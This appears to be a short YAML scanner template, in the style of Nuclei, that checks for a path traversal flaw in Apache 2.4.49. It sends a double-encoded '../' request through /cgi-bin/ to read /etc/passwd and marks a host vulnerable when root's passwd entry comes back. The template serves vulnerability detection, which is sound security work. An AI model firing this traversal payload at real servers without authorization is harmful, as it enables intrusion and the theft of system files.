id: apache_2.4.49_RCE
info:
  name: apache_2.4.49_RCE
  author: momika233
  severity: critical
  tags: cve,cve2022,apache,unauth

requests:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd"

    matchers-condition: and
    matchers:

      - type: word
        words:
          - "root:[x*]:0:0:"
        part: body

      - type: status
        status:
          - 200